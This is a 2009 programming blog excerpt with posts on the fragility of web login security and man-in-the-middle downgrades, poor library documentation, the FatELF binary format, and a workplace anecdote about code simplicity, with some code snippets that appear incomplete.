Tuesday, November 24, 2009

Malicious hackers are not out there

Security as it is today is an illusion. What? How could I say that, I'm not serious, am I?

Most people today do not understand what security is or is not about. As evidenced by so many works of modern fiction centering around a plot where the terrorists/foreign government/aliens "bug" a server, a cable, or a satellite. Today's technology is supposed to prevent attacks involving any layer in the middle being bugged. Besides not understanding what modern security is capable of, many who are working with it do not understand what it is not capable of.

A quick scan of source code in many projects will turn up code which fails even text book level security principals. I even see some major projects have code commented that it needs a more secure hash or nonce generator or something similar, which again could be found in modern textbooks.

It is shocking the sheer number of online services or applications one can install (forums, webmail, blog, wiki, etc...) that have insecure login. Nearly all of them take user login credentials in plain text, allowing anyone between the user's computer and the website's application to steal the passwords.

It is sad that nearly all sites use a custom login scheme that can be buggy and/or receive login credentials unencrypted, considering that HTTP - the protocol level of communication supports secure logins. HTTP login is rarely used though because it lacks a simple way to log out (why?), and can not be made to look pretty without using AJAX, which is why the vast majority of site creators avoid it.

The HTTP specifications actually describes two methods of login for "HTTP 401", one called "Basic Authentication", and another called "Digest Authentication". The former transmits login credentials in plain text, and the latter using an encryption of sorts. Most sites that avoid the worry of properly creating a custom login scheme and resort to HTTP 401 generally use Basic Authentication. Historically the reason is that most developers of HTTP servers and clients have been too stupid to figure out how to do it properly. Which is surprising considering it is such a simple scheme. IIS and IE didn't have it done properly till relatively recently. Apache historically has had issues with it. Qt's network classes handled it improperly until recently. I'm also told Google Chrome currently has some issues with it.

However, even if one used Digest as the login mechanism on their website, it can easily be subject to a
Man in the middle attack, because the HTTP spec allows for there to be the possibility of sending passwords in an unencrypted fashion.

The following diagram illustrates it:

Since requests for authentication are requested from the server and not the client, the machine in the middle can change the request to be the insecure variant.

So of course the next level up is HTTPS, which does HTTP over SSL/TLS, which is supposed to provide end to end security, preventing man in the middle attacks. This level of security makes all those fiction stories fail in their plot. It also is supposed to keep us safe, and is used by websites for processing credit card information and other sensitive material.

However, most users just type "something.muffin" into their browser, instead of prefixing it with http:// or https://, which will default to http://. Which again means the server has to initiate the secure connection. Since again this is also over a system which has both secure and insecure methods of communication, the same type of man in the middle attack as above can be performed.

The following diagram illustrates it:

Webservers are generally the one that initiates the redirection to an HTTPS page, which can be modified by the server in the middle. Any URL within a page which begins with https:// can be rewritten. For example, https://something.muffin can be changed to http://something.muffin:443 by an attacker in the middle, and then proceed with the attack as described above.

Of course users should be looking for padlocks and green labels and similar in their browser, but how many do so? Since most sites people visit aren't running in secure environments, do you expect them to really notice when some page which is supposed to be secure isn't? Do you expect users to be savvy about security when most developers aren't?

The amount of data which should be transferred securely but isn't is mind boggling. I see websites create a security token over HTTPS, but then pass that token around over HTTP, allowing anyone in the middle to steal it. I see people e-mail each other passwords to accounts on machines they manage all the time. I see database administrators login to phpMyAdmin running on servers with their root passwords sent in plain text. People working on projects together frequently send each other login credentials over forums or IRC in plain text.

Anyone managing a hub somewhere on the vast internet should be able to log tons and tons of passwords. Once a password is gotten to someone's e-mail or forum account, then that can be scanned for even more passwords. Also, I see many users save root/admin passwords in plain text files on web servers, if one managed to get into their account by nabbing their password to it, they quite often will also be able to gain root by a simple scan of the user's files. Even if not, once access is gained to a machine, privilege escalation is usually the norm as opposed to the exception, because server administrators quite often do not keep up with security updates, or are afraid to alter a server that they finally got working.

Careful pondering would show our entire infrastructure for communication is really a house of cards. It wouldn't be that hard for a small team with a bit of capital to setup free proxy servers around the world, offer free wi-fi at a bunch of hotspots, or start a small ISP. So the question we have to ask ourselves, is why are we still standing with everything in the shaky state it's in? I think the answer is simple, the malicious hackers really aren't out there. Sure there's hackers out there, and some of them do wreak a bit of havoc. But it seems no one is really interested in making trouble on a large scale.

Mostly the hackers you hear about are people in a competition, or research, or those "security hackers", which have gone legit and want to help you secure your business. It's funny the amount of times I heard a story about how some bigwig at a company goes to some sort of computer expo, and runs across a table or booth of security "gurus". The bigwig asks how the security gurus can help his business, with the response asking if the bigwig owns a website. Once the bigwig mentions the name of his site, one guru pulls out his laptop and shows the bigwig the site with it defaced in some way. The bigwig panics and immediately hires them to do a whole load of nothing. Little does he realize he was just man-in-the-middle'd.

Tuesday, November 10, 2009

We got excellent documentation!

Ever try to work with a library you've never dealt with before? How do you approach the task? Do you try to find another program which uses the library and cannibalize it? Get someone who already knows how to use it to teach you? Find a good example? Or just trudge your way through and get something that barely works?

I personally would like to have some good documentation which tells me exactly what I need to do to get the job done. Something which I can rely on to tell me everything I need to know, and to avoid any particular pitfalls.

Except most of the time documentation is written by people who would be better off in some other profession. Like terrorist interrogators. Or perhaps the Spanish Inquisition.

Although when you talk to people about the documentation for their library, they act like the documentation is two stone tablets brought down from heaven with sacred commandments written on them. Perhaps it is. But in the same fashion, the documentation is just as mysterious to anyone who hasn't spent years studying the library to decipher its true meaning.

For many libraries, I have spent hours pouring over their documentation, to come up with like 5-10 lines of code to do what I needed to do. 10 hours for 10 lines of code? A bit much I think. Why can't people make documentation for those not familiar with the library, so they can get all the basic tasks done, and provide good reference for anything more advanced? Sometimes the documentation is so completely unhelpful, that I have to resort to the source code, or scour the internet for something to help me. This is completely unacceptable.

Lets look at some of the various types of offenders.

Doxygen equals documentation.

This is the kind of documentation written by those obnoxious programmers who don't want to write any documentation at all. They run a script on their source code which creates a set of HTML pages with a list of all the files in the library, a list of functions and classes, and all nicely interlinked. It also pulls out the comments about each function and clearly displays it. Sure it makes it easy to jump back and forth in a browser between various internals of the source. But it really gives no insight on how to use the library. If the library is written really cleanly, and commented well, perhaps this helps, but usually those creating the library didn't put any more effort into it than they put into creating their documentation.

Really, honest, there's documentation!

Then there are those that try to convince you they have documentation. You have a set of text files, or an HTML file, or a PDF or whatever which tells you how amazing the library is, and tells you all the wonderful things the library is capable of. They'll even give you notable examples of programs using their library. You'll have a great comparison chart of why this library is better than its competitors. You'll even get some design documentation, rational, and tips on how you can expand the library further. Good luck finding a single sentence which actually tells you how to use it.

We got you the bare essentials right over here, or was it over there?

Then you have the documentation which can never give you any complete idea. Sure, just use this function and pass it these six arrays all filled out. Don't worry about what to put in them, those arrays are explained on another page. Oh yeah this array can be used for a trillion different things, depending on which function you use it with, so we'll just enumerate what you may want to use it for. You may get more information looking at these data types though. Before you know it, you're looking at 20 different pages trying to figure out how to bring together the information to use a single function.

I see your warrant, and I raise you a lawyer!

This kind of documentation seems to be written by those that don't actually want you to use their library and are all evasive about it. Every time you think the documentation is going to comply and actually tell you something useful, you're faced with something that isn't what you wanted. You'll get a bunch of small 4 line examples, each that do something, but no explanation as to what they're doing exactly. You'll even be told here and there some cryptic details about what a function supposedly does. Good luck figuring how to use anything.

I see your lawyer, and I'll bury you with an army of lawyers!

This is one of the worst offenders that big companies or organizations generally pull. You'll get "complete working examples", and a lot of it. The examples will be thousands of lines long and perform a million other things besides what the library itself does, let alone the function you just looked up. Good luck finding what you need amidst all the noise. The Dietel & Dietel line of how to program books that many colleges and universities use play the same game. Create enough information overload in the simplest of cases and force you to switch to a major in marketing.

I'm sorry your honor, I didn't realize I didn't turn over the last chapter.

This kind of documentation isn't so bad. You'll get some good notes on how to do all the basic stuff the library is capable of. But any function or class with any sort of complexity is completely missing, and you'll have to refer to the source code. But I guess the authors don't know how to put the trickier things into words, at least not like the easier stuff.

I think that about sums it up. There are some libraries out there with good documentation, but usually its of the kinds described above. Anyone else feel the same way?

Friday, November 6, 2009

FatELF Dead?

A while back, someone came up with a project called FatELF. I won't go into the exact details of all its trying to accomplish, but the basic idea was that like Mac OS X has universal binaries using the Mach-o object format which can run on multiple architectures, the same should be possible with software for Linux and FreeBSD, which use the ELF object format.

The creators of FatELF cite many different reasons why FatELF is a good idea, which most of us probably disagree with. But I found it could solve a pretty crucial issue today.

The x86 line of processors which is what everyone uses for their home PCs recently switched from 32-bit to 64-bit. 64-bit x86 known as x86-64 is backwards compatible with the old architecture. However programs written for the new one generally run faster.

x86-64 CPUs contain more registers than traditional x86-32 ones, so a CPU can juggle more data internally without offloading it to much slower RAM. Also, most distributions offered precompiled binaries designed for a very low common denominator, generally a 4x86 or the original Pentium. Programs compiled for these older processors can't take advantage of much of the improvements that have been done to the x86 line in the past 15 years. A distribution which targets the lowest common denominator for x86-64 on the other hand is targeting a much newer architecture, where every chip already contains MMX, SSE, similar technologies, and other general enhancements.

Installing a distribution geared for x86-64 can mean a much better computing experience for the most part. Except certain programs unfortunately are not yet 64 bit ready, or are closed source and can't be easily recompiled. In the past year or two, a lot of popular proprietary software were ported by their companies to x86-64, but some which are important for business fail completely under x86-64, such as Cisco's Webex.

x86-32 binaries can run on x86-64, provided all the libraries it needs are available on the system. However, many distributions don't provide x86-32 libraries on their x86-64 platform, or they provide only a couple, or provide ones which simply don't work.

All these issues could be fixed if FatELF was supported by the operating system. A distribution could provide an x86-64 platform, with all the major libraries containing both 32 and 64 bit versions within. Things like GTK, Qt, cURL, SDL, libao, OpenAL, and etc. We wouldn't have to worry about one of these libraries conflicting when installing two variations, or simply missing from the system.

It would make it easier on those on an x86-64 bit platform knowing they can run any binary they get elsewhere without a headache. It would also ease deployment issues for those that don't do anything special to take advantage of x86-64, and just want to pass out a single version of their software.

I as a developer have to have an x86-32 chroot on all my development systems to make sure I can produce 32 bit binaries properly, which is also a hassle. All too often I have to jump back and forth between a 32 bit shell to compile the code, and a 64 bit shell where I have the rest of my software needed to analyze it, and commit it.

But unfortunately, it now seems FatELF is dead, or on its way.

I wish we could find a fully working solution to the 32 on 64 bit problem that crops up today.

Thursday, November 5, 2009

They actually want bad code

So I was in this huge meeting yesterday, and I got the shock of my life.

We were discussing how we're going to go about creating and marketing a new program which will be deployed on the servers of our clients. When I suggested I be the one to take charge of the program design and creation, and handpick my team of the best programmers in the company to write the code, I was shot down. The reason? They don't want the program to be written correctly. They don't want the code written by people who know what they're doing.

That had me completely flabbergasted. I needed more details. I asked what exactly was wrong with the way I did things? With creating the program properly? Our chief executive in charge of marketing dependability and quick maintenance boiled it down for me.

The problems with me writing the code are as follows:
No matter which language(s) we choose to build the program with, whether it be C++, PHP, C#, or something else, I'm going to make sure we use the classes and functions provided by the language most fit for use in our program. Every single function will be as clear and minimalistic and self contained as possible. And this is evil in terms of dependability and quick maintenance.

If for example we used C# with .NET and I found just the perfect class out of the few thousand provided to fit the job, and it turns out down the line some issue crops up, apparently, they can't complain to Microsoft. Microsoft will tell them no one uses that class, and it is probably buggy, and they'll put it on a todo list to be looked at several months down the line.

If I use any function or class in C++ or PHP outside of the most basic 10-20 ones that dime-a-dozen programmers learn right away, they won't be able to get someone outside our group of professionals to review and fix it.

Basically, they want the program written only using classes, functions, arrays, loops, and the least amount of standard library usage. Because a random programmer most likely will barely be familiar with anything contained within the standard library.

They would prefer reinventing built in functions, and also having them written incorrectly, in terms of output correctness, and running time. Since it means a programmer will never need to look in a manual to be able to understand a piece of code and fix it. Which is important apparently, as most can only figure out what is wrong with the logic directly in front of them, and then try to brute force correct output.

But it doesn't even stop at good code making good use of the language, instead of reinventing the wheel.

Quite often in our existing projects, I go to look at a bug report, and notice some function which works incorrectly, and in the process of fixing it, I condense the logic and make the code much better. Let me give an example.

This is very similar to an existing case we had. The code was as follows:

This function creates a log on Sunday, Tuesday, Thursday
It takes as input an integer with a value of 1-7, 1 being Sunday.
void logEveryOtherDay(int dayOfTheWeek)
if (dayOfTheWeek == 1)
else if (dayOfTheWeek == 3)
else if (dayOfTheWeek == 5)

The problem reported was that logs from Sunday missed the ----- separator before it, and they'd want a log on Saturday too if ran then. When fixing it, the code annoyed me, and I quickly cleaned it to the following:

//This functions takes an integer and returns true if it's odd, and false if even
static bool isOdd(int i) { return(i&1); }

static const char *daysOfTheWeek[] = {
0, //Begin with nothing, as we number the days of the week 1-7
"Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday"

This function creates a log on Sunday, Tuesday, Thursday, Saturday
It takes as input an integer with a value of 1-7, 1 being Sunday.
void logEveryOtherDay(int dayOfTheWeek)
if (isOdd(dayOfTheWeek)) //Logging isn't done on even days

I think it should be obvious my code has much cleaner logic, and should be easy for any reasonable programmer to follow. I frequently do things like this. I even once went to look at a 2000 line function which had roughly a dozen bug reports against it, was a total mess, and ran really really slowly. Instead of hunting for the cause of each issue in it, I decided to scrap it. I created 2 helper functions, one 3 lines, the other 5, and rewrote the body of the function from 2000 lines to roughly 40. Instead of many nested ifs and several loops, we now had a single if and else which did exactly what they needed to, and called one of the two helper functions as needed where the real looping was done. The new function was profiled to run an order of a magnitude faster, and it passed all the test cases we designed, where the original failed a few. It now also contained 2 new features which were sorely lacking from the original. It was now also much easier to read it for correctness, as much less was going on in any section of the code.

But as this executive continued to tell me, what I did on these occasions is evil for an average programmer.

They can't comprehend a small amount of code doing so much. They can't understand what isOdd() does or is trying to do, unless they actually see its source. Its source of "return(i&1);" is just too confusing for them, because they don't know what "&1" means, nor can they comprehend how it can return true or false without containing an elaborate body of code. They can't just take the comment at face value that it does what it says it does. They are also frightened when they review different versions of a file to try to trace a bug when they see a ton of code just disappeared at some point, yet says it does more in the commit log.

So to sum it up, they don't want me, or programmers like me working on any code that is to be deployed on a client's server. When a client from Africa, or South America calls us up with a problem, they don't want to fly one of our good programmers down there to look at it. They want to make sure they can hire someone on site in one of those places to go and look at the problem and fix it quickly. Which apparently can't happen when there's no guarantee of being able to hirer a good programmer there on short notice, and other kinds of programmers can't deal with good code or standard library/class usage.

This mentality makes me very scared, although I guess it does explain to some extent why I find the innards of many rather large open source projects which are used commercially to be filled with tons of spaghetti logic, and written in a manner which suggests the author didn't really know what they were doing, nor should they be allowed to write code.

Anyone experience anything similar? Comments?